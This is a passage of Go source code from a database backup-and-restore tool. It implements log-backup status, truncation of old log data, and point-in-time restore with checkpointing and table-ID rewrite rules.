	advancerd := daemon.New(advancer, streamhelper.OwnerManagerForLogBackup(ctx, etcdCLI), cfg.AdvancerCfg.TickDuration)
	loop, err := advancerd.Begin(ctx)
	if err != nil {
		return err
	}
	// Blocks until the advancer loop exits.
	loop()
	return nil
}
// checkConfigForStatus ensures at least one PD address was supplied, since
// the status-related commands must reach PD.
func checkConfigForStatus(pd []string) error {
	if len(pd) != 0 {
		return nil
	}
	return errors.Annotatef(berrors.ErrInvalidArgument,
		"the command needs access to PD, please specify `-u` or `--pd`")
}
// makeStatusController wires up a stream.StatusController from the config:
// an etcd-backed task metadata client, a table or JSON printer, and a
// connection manager. (It lives here rather than in the `stream` package to
// avoid a cyclic import.)
func makeStatusController(ctx context.Context, cfg *StreamConfig, g glue.Glue) (*stream.StatusController, error) {
	console := glue.GetConsole(g)
	etcdCLI, err := dialEtcdWithCfg(ctx, cfg.Config)
	if err != nil {
		return nil, err
	}
	cli := streamhelper.NewMetaDataClient(etcdCLI)

	var printer stream.TaskPrinter
	if cfg.JSONOutput {
		printer = stream.PrintTaskWithJSON(console)
	} else {
		printer = stream.PrintTaskByTable(console)
	}

	mgr, err := NewMgr(ctx, g, cfg.PD, cfg.TLS, GetKeepalive(&cfg.Config),
		cfg.CheckRequirements, false, conn.StreamVersionChecker)
	if err != nil {
		return nil, err
	}
	return stream.NewStatusController(cli, mgr, printer), nil
}
// RunStreamStatus prints the status of the stream task named in cfg via the
// status controller.
func RunStreamStatus(
	c context.Context,
	g glue.Glue,
	cmdName string,
	cfg *StreamConfig,
) error {
	ctx, cancelFn := context.WithCancel(c)
	defer cancelFn()

	if span := opentracing.SpanFromContext(ctx); span != nil && span.Tracer() != nil {
		span1 := span.Tracer().StartSpan(
			"task.RunStreamStatus",
			opentracing.ChildOf(span.Context()),
		)
		defer span1.Finish()
		ctx = opentracing.ContextWithSpan(ctx, span1)
	}

	if err := checkConfigForStatus(cfg.PD); err != nil {
		return err
	}
	ctl, err := makeStatusController(ctx, cfg, g)
	if err != nil {
		return err
	}
	return ctl.PrintStatusOfTask(ctx, cfg.TaskName)
}
// RunStreamTruncate truncates the log that belong to (0, until-ts).
// It prompts the user (unless --yes), persists the new truncate safe point
// on the storage, then deletes data files and rewrites metadata in batches.
func RunStreamTruncate(c context.Context, g glue.Glue, cmdName string, cfg *StreamConfig) error {
	console := glue.GetConsole(g)
	em := color.New(color.Bold).SprintFunc()
	warn := color.New(color.Bold, color.FgHiRed).SprintFunc()
	formatTS := func(ts uint64) string {
		return oracle.GetTimeFromTS(ts).Format("2006-01-02 15:04:05.0000")
	}
	if cfg.Until == 0 {
		return errors.Annotatef(berrors.ErrInvalidArgument, "please provide the `--until` ts")
	}
	ctx, cancelFn := context.WithCancel(c)
	defer cancelFn()
	storage, err := cfg.makeStorage(ctx)
	if err != nil {
		return err
	}
	// sp is the truncate safe point recorded by a previous truncation run.
	sp, err := restore.GetTSFromFile(ctx, storage, restore.TruncateSafePointFileName)
	if err != nil {
		return err
	}
	// Warn when the requested ts is older than an already-recorded truncation.
	if cfg.Until < sp {
		console.Println("According to the log, you have truncated backup data before", em(formatTS(sp)))
		if !cfg.SkipPrompt && !console.PromptBool("Continue? ") {
			return nil
		}
	}
	readMetaDone := console.ShowTask("Reading Metadata... ", glue.WithTimeCost())
	metas := restore.StreamMetadataSet{
		MetadataDownloadBatchSize: cfg.MetadataDownloadBatchSize,
		Helper: stream.NewMetadataHelper(),
		DryRun: cfg.DryRun,
	}
	// shiftUntilTS is the boundary actually used for deletion; presumably it
	// is shifted back from cfg.Until to keep still-needed entries — confirm
	// against LoadUntilAndCalculateShiftTS.
	shiftUntilTS, err := metas.LoadUntilAndCalculateShiftTS(ctx, storage, cfg.Until)
	if err != nil {
		return err
	}
	readMetaDone()
	// Tally what will be removed, for the prompt and the progress bar.
	var (
		fileCount int = 0
		kvCount int64 = 0
		totalSize uint64 = 0
	)
	metas.IterateFilesFullyBefore(shiftUntilTS, func(d *restore.FileGroupInfo) (shouldBreak bool) {
		fileCount++
		totalSize += d.Length
		kvCount += d.KVCount
		return
	})
	console.Printf("We are going to remove %s files, until %s.\n",
		em(fileCount),
		em(formatTS(cfg.Until)),
	)
	if !cfg.SkipPrompt && !console.PromptBool(warn("Sure? ")) {
		return nil
	}
	// Persist the new safe point before deleting (skipped in dry-run), so a
	// crash mid-delete still leaves the truncation recorded.
	if cfg.Until > sp && !cfg.DryRun {
		if err := restore.SetTSToFile(
			ctx, storage, cfg.Until, restore.TruncateSafePointFileName); err != nil {
			return err
		}
	}
	// begin to remove
	p := console.StartProgressBar(
		"Clearing Data Files and Metadata", fileCount,
		glue.WithTimeCost(),
		glue.WithConstExtraField("kv-count", kvCount),
		glue.WithConstExtraField("kv-size", fmt.Sprintf("%d(%s)", totalSize, units.HumanSize(float64(totalSize)))),
	)
	defer p.Close()
	notDeleted, err := metas.RemoveDataFilesAndUpdateMetadataInBatch(ctx, shiftUntilTS, storage, p.IncBy)
	if err != nil {
		return err
	}
	if err := p.Wait(ctx); err != nil {
		return err
	}
	// Report files that could not be deleted so the user can clean them up
	// manually; only the first few are listed.
	if len(notDeleted) > 0 {
		const keepFirstNFailure = 16
		console.Println("Files below are not deleted due to error, you may clear it manually, check log for detail error:")
		console.Println("- Total", em(len(notDeleted)), "items.")
		if len(notDeleted) > keepFirstNFailure {
			console.Println("-", em(len(notDeleted)-keepFirstNFailure), "items omitted.")
			// TODO: maybe don't add them at the very first.
			notDeleted = notDeleted[:keepFirstNFailure]
		}
		for _, f := range notDeleted {
			console.Println(f)
		}
	}
	return nil
}
// checkTaskExists rejects a PiTR restore when a log backup task or a CDC
// changefeed is active on the target cluster, since restoring under either
// would corrupt their output.
func checkTaskExists(ctx context.Context, cfg *RestoreConfig, etcdCLI *clientv3.Client) error {
	if err := checkConfigForStatus(cfg.PD); err != nil {
		return err
	}

	// Reject when any log backup task is registered.
	tasks, err := streamhelper.NewMetaDataClient(etcdCLI).GetAllTasks(ctx)
	if err != nil {
		return err
	}
	if len(tasks) != 0 {
		return errors.Errorf("log backup task is running: %s, "+
			"please stop the task before restore, and after PITR operation finished, "+
			"create log-backup task again and create a full backup on this cluster", tasks[0].Info.Name)
	}

	// Reject when any CDC changefeed exists.
	nameSet, err := utils.GetCDCChangefeedNameSet(ctx, etcdCLI)
	if err != nil {
		return err
	}
	if !nameSet.Empty() {
		return errors.Errorf("%splease stop changefeed(s) before restore", nameSet.MessageToUser())
	}
	return nil
}
// RunStreamRestore restores stream log.
//
// It first restores the full snapshot (when a full backup storage is given
// and checkpointing does not say that phase already finished), then replays
// the log between cfg.StartTS and cfg.RestoreTS.
func RunStreamRestore(
	c context.Context,
	g glue.Glue,
	cmdName string,
	cfg *RestoreConfig,
) (err error) {
	ctx, cancelFn := context.WithCancel(c)
	defer cancelFn()
	if span := opentracing.SpanFromContext(ctx); span != nil && span.Tracer() != nil {
		span1 := span.Tracer().StartSpan("task.RunStreamRestore", opentracing.ChildOf(span.Context()))
		defer span1.Finish()
		ctx = opentracing.ContextWithSpan(ctx, span1)
	}

	_, s, err := GetStorage(ctx, cfg.Config.Storage, &cfg.Config)
	if err != nil {
		return errors.Trace(err)
	}
	logInfo, err := getLogRangeWithStorage(ctx, &cfg.Config, s)
	if err != nil {
		return errors.Trace(err)
	}
	// Default the restore target to the newest resolvable log timestamp.
	if cfg.RestoreTS == 0 {
		cfg.RestoreTS = logInfo.logMaxTS
	}

	if len(cfg.FullBackupStorage) > 0 {
		startTS, fullClusterID, err := getFullBackupTS(ctx, cfg)
		if err != nil {
			return errors.Trace(err)
		}
		if logInfo.clusterID > 0 && fullClusterID > 0 && logInfo.clusterID != fullClusterID {
			return errors.Annotatef(berrors.ErrInvalidArgument,
				"the full snapshot(from cluster ID:%v) and log(from cluster ID:%v) come from different cluster.",
				fullClusterID, logInfo.clusterID)
		}
		// The snapshot's ts must fall inside the log range, or the replay
		// would have a gap.
		cfg.StartTS = startTS
		if cfg.StartTS < logInfo.logMinTS {
			return errors.Annotatef(berrors.ErrInvalidArgument,
				"it has gap between full backup ts:%d(%s) and log backup ts:%d(%s). ",
				cfg.StartTS, oracle.GetTimeFromTS(cfg.StartTS),
				logInfo.logMinTS, oracle.GetTimeFromTS(logInfo.logMinTS))
		}
	}

	log.Info("start restore on point",
		zap.Uint64("restore-from", cfg.StartTS), zap.Uint64("restore-to", cfg.RestoreTS),
		zap.Uint64("log-min-ts", logInfo.logMinTS), zap.Uint64("log-max-ts", logInfo.logMaxTS))
	if err := checkLogRange(cfg.StartTS, cfg.RestoreTS, logInfo.logMinTS, logInfo.logMaxTS); err != nil {
		return errors.Trace(err)
	}

	curTaskInfo, doFullRestore, err := checkPiTRTaskInfo(ctx, g, s, cfg)
	if err != nil {
		return errors.Trace(err)
	}

	failpoint.Inject("failed-before-full-restore", func(_ failpoint.Value) {
		failpoint.Return(errors.New("failpoint: failed before full restore"))
	})

	recorder := tiflashrec.New()
	cfg.tiflashRecorder = recorder
	// restore full snapshot.
	if doFullRestore {
		logStorage := cfg.Config.Storage
		cfg.Config.Storage = cfg.FullBackupStorage
		// TiFlash replica is restored to down-stream on 'pitr' currently.
		if err = runRestore(ctx, g, FullRestoreCmd, cfg); err != nil {
			return errors.Trace(err)
		}
		cfg.Config.Storage = logStorage
	} else if len(cfg.FullBackupStorage) > 0 {
		// Checkpoint mode says the snapshot phase already ran: skip it and
		// recover the TiFlash records from the checkpoint instead.
		skipMsg := []byte(fmt.Sprintf("%s command is skipped due to checkpoint mode for restore\n", FullRestoreCmd))
		if _, err := glue.GetConsole(g).Out().Write(skipMsg); err != nil {
			return errors.Trace(err)
		}
		if curTaskInfo != nil && curTaskInfo.TiFlashItems != nil {
			log.Info("load tiflash records of snapshot restore from checkpoint")
			// (A vestigial `if err != nil` check was removed here: `err` is
			// provably nil at this point.)
			cfg.tiflashRecorder.Load(curTaskInfo.TiFlashItems)
		}
	}
	// restore log.
	cfg.adjustRestoreConfigForStreamRestore()
	if err := restoreStream(ctx, g, cfg, curTaskInfo, logInfo.logMinTS, logInfo.logMaxTS); err != nil {
		return errors.Trace(err)
	}
	return nil
}
// RunStreamRestore start restore job
func restoreStream(
c context.Context,
g glue.Glue,
cfg *RestoreConfig,
taskInfo *checkpoint.CheckpointTaskInfoForLogRestore,
logMinTS, logMaxTS uint64,
) (err error) {
var (
totalKVCount uint64
totalSize uint64
checkpointTotalKVCount uint64
checkpointTotalSize uint64
mu sync.Mutex
startTime = time.Now()
)
defer func() {
if err != nil {
summary.Log("restore log failed summary", zap.Error(err))
} else {
totalDureTime := time.Since(startTime)
summary.Log("restore log success summary", zap.Duration("total-take", totalDureTime),
zap.Uint64("restore-from", cfg.StartTS), zap.Uint64("restore-to", cfg.RestoreTS),
zap.String("restore-from", stream.FormatDate(oracle.GetTimeFromTS(cfg.StartTS))),
zap.String("restore-to", stream.FormatDate(oracle.GetTimeFromTS(cfg.RestoreTS))),
zap.Uint64("total-kv-count", totalKVCount),
zap.Uint64("skipped-kv-count-by-checkpoint", checkpointTotalKVCount),
zap.String("total-size", units.HumanSize(float64(totalSize))),
zap.String("skipped-size-by-checkpoint", units.HumanSize(float64(checkpointTotalSize))),
zap.String("average-speed", units.HumanSize(float64(totalSize)/totalDureTime.Seconds())+"/s"),
)
}
}()
ctx, cancelFn := context.WithCancel(c)
defer cancelFn()
if span := opentracing.SpanFromContext(ctx); span != nil && span.Tracer() != nil {
span1 := span.Tracer().StartSpan(
"restoreStream",
opentracing.ChildOf(span.Context()),
)
defer span1.Finish()
ctx = opentracing.ContextWithSpan(ctx, span1)
}
mgr, err := NewMgr(ctx, g, cfg.PD, cfg.TLS, GetKeepalive(&cfg.Config),
cfg.CheckRequirements, true, conn.StreamVersionChecker)
if err != nil {
return errors.Trace(err)
}
defer mgr.Close()
client, err := createRestoreClient(ctx, g, cfg, mgr)
if err != nil {
return errors.Annotate(err, "failed to create restore client")
}
defer client.Close()
var currentTS uint64
if taskInfo != nil && taskInfo.RewriteTS > 0 {
// reuse the task's rewrite ts
log.Info("reuse the task's rewrite ts", zap.Uint64("rewrite-ts", taskInfo.RewriteTS))
currentTS = taskInfo.RewriteTS
} else {
currentTS, err = client.GetTSWithRetry(ctx)
if err != nil {
return errors.Trace(err)
}
}
client.SetCurrentTS(currentTS)
restoreSchedulers, _, err := restorePreWork(ctx, client, mgr, false)
if err != nil {
return errors.Trace(err)
}
// Always run the post-work even on error, so we don't stuck in the import
// mode or emptied schedulers
defer restorePostWork(ctx, client, restoreSchedulers)
// It need disable GC in TiKV when PiTR.
// because the process of PITR is concurrent and kv events isn't sorted by tso.
restoreGc, oldRatio, err := KeepGcDisabled(g, mgr.GetStorage())
if err != nil {
return errors.Trace(err)
}
gcDisabledRestorable := false
defer func() {
// don't restore the gc-ratio-threshold if checkpoint mode is used and restored is not finished
if cfg.UseCheckpoint && !gcDisabledRestorable {
log.Info("skip restore the gc-ratio-threshold for next retry")
return
}
log.Info("start to restore gc", zap.String("ratio", oldRatio))
if err := restoreGc(oldRatio); err != nil {
log.Error("failed to set gc enabled", zap.Error(err))
}
log.Info("finish restoring gc")
}()
var taskName string
var checkpointRunner *checkpoint.CheckpointRunner[checkpoint.LogRestoreKeyType, checkpoint.LogRestoreValueType]
if cfg.UseCheckpoint {
taskName = cfg.generateLogRestoreTaskName(client.GetClusterID(ctx), cfg.StartTS, cfg.RestoreTS)
oldRatioFromCheckpoint, err := client.InitCheckpointMetadataForLogRestore(ctx, taskName, oldRatio)
if err != nil {
return errors.Trace(err)
}
oldRatio = oldRatioFromCheckpoint
checkpointRunner, err = client.StartCheckpointRunnerForLogRestore(ctx, taskName)
if err != nil {
return errors.Trace(err)
}
defer func() {
log.Info("wait for flush checkpoint...")
checkpointRunner.WaitForFinish(ctx, !gcDisabledRestorable)
}()
}
err = client.InstallLogFileManager(ctx, cfg.StartTS, cfg.RestoreTS, cfg.MetadataDownloadBatchSize)
if err != nil {
return err
}
// get full backup meta storage to generate rewrite rules.
fullBackupStorage, err := parseFullBackupTablesStorage(ctx, cfg)
if err != nil {
return errors.Trace(err)
}
// load the id maps only when the checkpoint mode is used and not the first execution
newTask := true
if taskInfo != nil && taskInfo.Progress == checkpoint.InLogRestoreAndIdMapPersist {
newTask = false
}
// get the schemas ID replace information.
schemasReplace, err := client.InitSchemasReplaceForDDL(ctx, &restore.InitSchemaConfig{
IsNewTask: newTask,
HasFullRestore: len(cfg.FullBackupStorage) > 0,
TableFilter: cfg.TableFilter,
TiFlashRecorder: cfg.tiflashRecorder,
FullBackupStorage: fullBackupStorage,
})
if err != nil {
return errors.Trace(err)
}
schemasReplace.AfterTableRewritten = func(deleted bool, tableInfo *model.TableInfo) {
// When the table replica changed to 0, the tiflash replica might be set to `nil`.
// We should remove the table if we meet.
if deleted || tableInfo.TiFlashReplica == nil {
cfg.tiflashRecorder.DelTable(tableInfo.ID)
return
}
cfg.tiflashRecorder.AddTable(tableInfo.ID, *tableInfo.TiFlashReplica)
// Remove the replica firstly. Let's restore them at the end.
tableInfo.TiFlashReplica = nil
}
updateStats := func(kvCount uint64, size uint64) {
mu.Lock()
defer mu.Unlock()
totalKVCount += kvCount
totalSize += size
}
dataFileCount := 0
ddlFiles, err := client.LoadDDLFilesAndCountDMLFiles(ctx, &dataFileCount)
if err != nil {
return err
}
pm := g.StartProgress(ctx, "Restore Meta Files", int64(len(ddlFiles)), !cfg.LogProgress)
if err = withProgress(pm, func(p glue.Progress) error {
client.RunGCRowsLoader(ctx)
return client.RestoreMetaKVFiles(ctx, ddlFiles, schemasReplace, updateStats, p.Inc)
}); err != nil {
return errors.Annotate(err, "failed to restore meta files")
}
rewriteRules := initRewriteRules(schemasReplace)
ingestRecorder := schemasReplace.GetIngestRecorder()
if err := client.RangeFilterFromIngestRecorder(ingestRecorder, rewriteRules); err != nil {
return errors.Trace(err)
}
// generate the upstream->downstream id maps for checkpoint
idrules := make(map[int64]int64)
downstreamIdset := make(map[int64]struct{})
for upstreamId, rule := range rewriteRules {
downstreamId := restore.GetRewriteTableID(upstreamId, rule)
idrules[upstreamId] = downstreamId
downstreamIdset[downstreamId] = struct{}{}
}
logFilesIter, err := client.LoadDMLFiles(ctx)
if err != nil {
return errors.Trace(err)
}
pd := g.StartProgress(ctx, "Restore KV Files", int64(dataFileCount), !cfg.LogProgress)
err = withProgress(pd, func(p glue.Progress) error {
if cfg.UseCheckpoint {
updateStatsWithCheckpoint := func(kvCount, size uint64) {
mu.Lock()
defer mu.Unlock()
totalKVCount += kvCount
totalSize += size
checkpointTotalKVCount += kvCount
checkpointTotalSize += size
}
logFilesIter, err = client.WrapLogFilesIterWithCheckpoint(ctx, logFilesIter, downstreamIdset, taskName, updateStatsWithCheckpoint, p.Inc)
if err != nil {
return errors.Trace(err)
}
}
logFilesIterWithSplit, err := client.WrapLogFilesIterWithSplitHelper(logFilesIter, rewriteRules, g, mgr.GetStorage())
if err != nil {
return errors.Trace(err)
}
return client.RestoreKVFiles(ctx, rewriteRules, idrules, logFilesIterWithSplit, checkpointRunner, cfg.PitrBatchCount, cfg.PitrBatchSize, updateStats, p.IncBy)
})
if err != nil {
return errors.Annotate(err, "failed to restore kv files")
}
if err = client.CleanUpKVFiles(ctx); err != nil {
return errors.Annotate(err, "failed to clean up")
}
if err = client.InsertGCRows(ctx); err != nil {
return errors.Annotate(err, "failed to insert rows into gc_delete_range")
}
if err = client.RepairIngestIndex(ctx, ingestRecorder, g, mgr.GetStorage(), taskName); err != nil {
return errors.Annotate(err, "failed to repair ingest index")
}
if cfg.tiflashRecorder != nil {
sqls := cfg.tiflashRecorder.GenerateAlterTableDDLs(mgr.GetDomain().InfoSchema())
log.Info("Generating SQLs for restoring TiFlash Replica",
zap.Strings("sqls", sqls))
err = g.UseOneShotSession(mgr.GetStorage(), false, func(se glue.Session) error {
for _, sql := range sqls {
if errExec := se.ExecuteInternal(ctx, sql); errExec != nil {
logutil.WarnTerm("Failed to restore tiflash replica config, you may execute the sql restore it manually.",
logutil.ShortError(errExec),
zap.String("sql", sql),
)
}
}
return nil
})
if err != nil {
return err
}
}
failpoint.Inject("do-checksum-with-rewrite-rules", func(_ failpoint.Value) {
if err := client.FailpointDoChecksumForLogRestore(ctx, mgr.GetStorage().GetClient(), mgr.GetPDClient(), idrules, rewriteRules); err != nil {
failpoint.Return(errors.Annotate(err, "failed to do checksum"))
}
})
gcDisabledRestorable = true
return nil
}
// createRestoreClient builds and fully initializes a restore.Client against
// the cluster managed by mgr: external storage backend, rate limit, cipher,
// concurrency, switch-mode interval and a raw-KV batch client. If any step
// after Init fails, the partially-initialized client is closed before return.
func createRestoreClient(ctx context.Context, g glue.Glue, cfg *RestoreConfig, mgr *conn.Mgr) (*restore.Client, error) {
	var err error
	keepaliveCfg := GetKeepalive(&cfg.Config)
	// Allow keepalive pings even while no stream is active.
	keepaliveCfg.PermitWithoutStream = true
	client := restore.NewRestoreClient(mgr.GetPDClient(), mgr.GetTLSConfig(), keepaliveCfg, false)
	err = client.Init(g, mgr.GetStorage())
	if err != nil {
		return nil, errors.Trace(err)
	}
	// err is the function-scoped variable, so every failure path below
	// triggers this cleanup of the already-initialized client.
	defer func() {
		if err != nil {
			client.Close()
		}
	}()

	u, err := storage.ParseBackend(cfg.Storage, &cfg.BackendOptions)
	if err != nil {
		return nil, errors.Trace(err)
	}

	opts := storage.ExternalStorageOptions{
		NoCredentials:   cfg.NoCreds,
		SendCredentials: cfg.SendCreds,
		HTTPClient:      storage.GetDefaultHttpClient(cfg.MetadataDownloadBatchSize),
	}
	if err = client.SetStorage(ctx, u, &opts); err != nil {
		return nil, errors.Trace(err)
	}
	client.SetRateLimit(cfg.RateLimit)
	client.SetCrypter(&cfg.CipherInfo)
	client.SetConcurrency(uint(cfg.Concurrency))
	client.SetSwitchModeInterval(cfg.SwitchModeInterval)
	client.InitClients(u, false, false)

	rawKVClient, err := newRawBatchClient(ctx, cfg.PD, cfg.TLS)
	if err != nil {
		return nil, errors.Trace(err)
	}
	client.SetRawKVClient(rawKVClient)

	err = client.LoadRestoreStores(ctx)
	if err != nil {
		return nil, errors.Trace(err)
	}
	return client, nil
}
// checkLogRange validates that the requested restore window
// [restoreFrom, restoreTo] lies entirely inside the available log range
// [logMinTS, logMaxTS].
func checkLogRange(restoreFrom, restoreTo, logMinTS, logMaxTS uint64) error {
	// Required ordering: logMinTS <= restoreFrom <= restoreTo <= logMaxTS.
	if logMinTS <= restoreFrom && restoreFrom <= restoreTo && restoreTo <= logMaxTS {
		return nil
	}
	return errors.Annotatef(berrors.ErrInvalidArgument,
		"restore log from %d(%s) to %d(%s), "+
			" but the current existed log from %d(%s) to %d(%s)",
		restoreFrom, oracle.GetTimeFromTS(restoreFrom),
		restoreTo, oracle.GetTimeFromTS(restoreTo),
		logMinTS, oracle.GetTimeFromTS(logMinTS),
		logMaxTS, oracle.GetTimeFromTS(logMaxTS),
	)
}
// withProgress executes cc with the given progress indicator and guarantees
// the indicator is closed once cc returns (the defer also fires on panic).
func withProgress(p glue.Progress, cc func(p glue.Progress) error) error {
	defer p.Close()
	return cc(p)
}
// nolint: unused, deadcode
// countIndices sums the number of indices over every table in ts.
func countIndices(ts map[int64]*metautil.Table) int64 {
	var total int64
	for _, tbl := range ts {
		total += int64(len(tbl.Info.Indices))
	}
	return total
}
// backupLogInfo describes the usable TS range and origin cluster of a log
// backup found in external storage.
type backupLogInfo struct {
	logMaxTS  uint64 // newest global checkpoint TS (>= logMinTS)
	logMinTS  uint64 // max(log start TS, truncate TS): earliest restorable TS
	clusterID uint64 // cluster the log backup was taken from
}
// getLogRange opens the configured log-backup storage and returns the
// log-min-ts / log-max-ts range recorded in it.
func getLogRange(
	ctx context.Context,
	cfg *Config,
) (backupLogInfo, error) {
	_, extStorage, err := GetStorage(ctx, cfg.Storage, cfg)
	if err != nil {
		return backupLogInfo{}, errors.Trace(err)
	}
	return getLogRangeWithStorage(ctx, cfg, extStorage)
}
// getLogRangeWithStorage computes the restorable TS range of the log backup
// stored in s: logMinTS is the later of the backup start TS and the truncate
// safepoint; logMaxTS is the newest global checkpoint, clamped to be no less
// than logMinTS.
func getLogRangeWithStorage(
	ctx context.Context,
	cfg *Config,
	s storage.ExternalStorage,
) (backupLogInfo, error) {
	// logStartTS: Get log start ts from backupmeta file.
	metaData, err := s.ReadFile(ctx, metautil.MetaFile)
	if err != nil {
		return backupLogInfo{}, errors.Trace(err)
	}
	backupMeta := &backuppb.BackupMeta{}
	if err = backupMeta.Unmarshal(metaData); err != nil {
		return backupLogInfo{}, errors.Trace(err)
	}
	// endVersion > 0 represents that the storage has been used for `br backup`,
	// i.e. it is a full-backup storage rather than a log-backup one.
	if backupMeta.GetEndVersion() > 0 {
		return backupLogInfo{}, errors.Annotate(berrors.ErrStorageUnknown,
			"the storage has been used for full backup")
	}
	logStartTS := backupMeta.GetStartVersion()

	// truncateTS: get log truncate ts from TruncateSafePointFileName.
	// If truncateTS equals 0, which represents the stream log has never been truncated.
	truncateTS, err := restore.GetTSFromFile(ctx, s, restore.TruncateSafePointFileName)
	if err != nil {
		return backupLogInfo{}, errors.Trace(err)
	}
	// Logs before the truncate safepoint are gone, so it lower-bounds the range.
	logMinTS := mathutil.Max(logStartTS, truncateTS)

	// get max global resolved ts from metas.
	logMaxTS, err := getGlobalCheckpointFromStorage(ctx, s)
	if err != nil {
		return backupLogInfo{}, errors.Trace(err)
	}
	logMaxTS = mathutil.Max(logMinTS, logMaxTS)

	return backupLogInfo{
		logMaxTS:  logMaxTS,
		logMinTS:  logMinTS,
		clusterID: backupMeta.ClusterId,
	}, nil
}
// getGlobalCheckpointFromStorage scans every "*.ts" file under the
// stream-backup global-checkpoint directory and returns the maximum
// checkpoint TS found. A zero return value means no checkpoint exists yet.
func getGlobalCheckpointFromStorage(ctx context.Context, s storage.ExternalStorage) (uint64, error) {
	var globalCheckPointTS uint64 = 0
	opt := storage.WalkOption{SubDir: stream.GetStreamBackupGlobalCheckpointPrefix()}
	err := s.WalkDir(ctx, &opt, func(path string, size int64) error {
		if !strings.HasSuffix(path, ".ts") {
			return nil
		}
		buff, err := s.ReadFile(ctx, path)
		if err != nil {
			return errors.Trace(err)
		}
		// Guard against truncated/corrupted checkpoint files:
		// binary.LittleEndian.Uint64 panics when given fewer than 8 bytes.
		if len(buff) < 8 {
			return errors.Annotatef(berrors.ErrInvalidArgument,
				"the global checkpoint file %s is broken: expect 8 bytes, got %d bytes", path, len(buff))
		}
		ts := binary.LittleEndian.Uint64(buff)
		globalCheckPointTS = mathutil.Max(ts, globalCheckPointTS)
		return nil
	})
	return globalCheckPointTS, errors.Trace(err)
}
// getFullBackupTS reads the backupmeta of the configured full-backup storage
// and returns its snapshot TS (the end version) together with the cluster ID
// the backup was taken from.
func getFullBackupTS(
	ctx context.Context,
	cfg *RestoreConfig,
) (uint64, uint64, error) {
	_, s, err := GetStorage(ctx, cfg.FullBackupStorage, &cfg.Config)
	if err != nil {
		return 0, 0, errors.Trace(err)
	}

	metaData, err := s.ReadFile(ctx, metautil.MetaFile)
	if err != nil {
		return 0, 0, errors.Trace(err)
	}

	backupmeta := &backuppb.BackupMeta{}
	if err = backupmeta.Unmarshal(metaData); err != nil {
		return 0, 0, errors.Trace(err)
	}

	return backupmeta.GetEndVersion(), backupmeta.GetClusterId(), nil
}
// parseFullBackupTablesStorage resolves the external-storage backend holding
// the full-backup meta, falling back to the log-backup storage when no
// dedicated full-backup storage was configured.
func parseFullBackupTablesStorage(
	ctx context.Context,
	cfg *RestoreConfig,
) (*restore.FullBackupStorageConfig, error) {
	backendName := cfg.Storage
	if len(cfg.FullBackupStorage) > 0 {
		backendName = cfg.FullBackupStorage
	}
	backend, err := storage.ParseBackend(backendName, &cfg.BackendOptions)
	if err != nil {
		return nil, errors.Trace(err)
	}
	return &restore.FullBackupStorageConfig{
		Backend: backend,
		Opts:    storageOpts(&cfg.Config),
	}, nil
}
// initRewriteRules builds, for every table and partition that passes the
// table filter (system schemas excluded), the key-rewrite rule mapping its
// upstream ID to its downstream ID.
func initRewriteRules(schemasReplace *stream.SchemasReplace) map[int64]*restore.RewriteRules {
	rules := make(map[int64]*restore.RewriteRules)
	filter := schemasReplace.TableFilter
	for _, dbReplace := range schemasReplace.DbMap {
		if utils.IsSysDB(dbReplace.Name) || !filter.MatchSchema(dbReplace.Name) {
			continue
		}
		for oldTableID, tableReplace := range dbReplace.TableMap {
			if !filter.MatchTable(dbReplace.Name, tableReplace.Name) {
				continue
			}
			// addRule registers a rule once per upstream ID; both the table
			// itself and each of its partitions go through this path.
			addRule := func(oldID, newID int64) {
				if _, exist := rules[oldID]; exist {
					return
				}
				log.Info("add rewrite rule",
					zap.String("tableName", dbReplace.Name+"."+tableReplace.Name),
					zap.Int64("oldID", oldID), zap.Int64("newID", newID))
				rules[oldID] = restore.GetRewriteRuleOfTable(oldID, newID, 0, tableReplace.IndexMap, false)
			}
			addRule(oldTableID, tableReplace.TableID)
			for oldID, newID := range tableReplace.PartitionMap {
				addRule(oldID, newID)
			}
		}
	}
	return rules
}
// newRawBatchClient builds a raw-KV batch client talking to pdAddrs using the
// given TLS material.
func newRawBatchClient(
	ctx context.Context,
	pdAddrs []string,
	tlsConfig TLSConfig,
) (*restore.RawKVBatchClient, error) {
	security := config.Security{
		ClusterSSLCA:   tlsConfig.CA,
		ClusterSSLCert: tlsConfig.Cert,
		ClusterSSLKey:  tlsConfig.Key,
	}
	cli, err := restore.NewRawkvClient(ctx, pdAddrs, security)
	if err != nil {
		return nil, errors.Trace(err)
	}
	return restore.NewRawKVBatchClient(cli, rawKVBatchCount), nil
}
// ShiftTS returns a TS earlier than startTS by streamShiftDuration, keeping a
// safety margin for in-flight transactions. It returns 0 when the shift would
// underflow the physical clock.
func ShiftTS(startTS uint64) uint64 {
	shifted := oracle.ExtractPhysical(startTS) - streamShiftDuration.Milliseconds()
	if shifted < 0 {
		return 0
	}
	return oracle.ComposeTS(shifted, oracle.ExtractLogical(startTS))
}
// buildPauseSafePointName derives the service-safepoint name used while the
// log-backup task named taskName is paused.
func buildPauseSafePointName(taskName string) string {
	return fmt.Sprint(taskName, "_pause_safepoint")
}
// checkPiTRRequirements refuses to run PiTR into a cluster that already
// contains user databases, listing them in the returned error.
func checkPiTRRequirements(ctx context.Context, g glue.Glue, cfg *RestoreConfig, mgr *conn.Mgr) error {
	userDBs := restore.GetExistedUserDBs(mgr.GetDomain())
	if len(userDBs) == 0 {
		return nil
	}
	names := make([]string, 0, len(userDBs))
	for _, db := range userDBs {
		names = append(names, db.Name.O)
	}
	return errors.Annotatef(berrors.ErrDatabasesAlreadyExisted,
		"databases %s existed in restored cluster, please drop them before execute PiTR",
		strings.Join(names, ","))
}
// checkPiTRTaskInfo loads any persisted PiTR checkpoint task info from
// external storage, decides whether the snapshot (full) restore phase still
// has to run, and persists a fresh `InSnapshotRestore` record for brand-new
// tasks. It returns the loaded task info (nil for a new task) and whether
// the full restore should be executed.
func checkPiTRTaskInfo(
	ctx context.Context,
	g glue.Glue,
	s storage.ExternalStorage,
	cfg *RestoreConfig,
) (*checkpoint.CheckpointTaskInfoForLogRestore, bool, error) {
	var (
		doFullRestore = (len(cfg.FullBackupStorage) > 0)
		curTaskInfo   *checkpoint.CheckpointTaskInfoForLogRestore
		errTaskMsg    string
	)
	mgr, err := NewMgr(ctx, g, cfg.PD, cfg.TLS, GetKeepalive(&cfg.Config),
		cfg.CheckRequirements, true, conn.StreamVersionChecker)
	if err != nil {
		return nil, false, errors.Trace(err)
	}
	defer mgr.Close()

	clusterID := mgr.GetPDClient().GetClusterID(ctx)
	if cfg.UseCheckpoint {
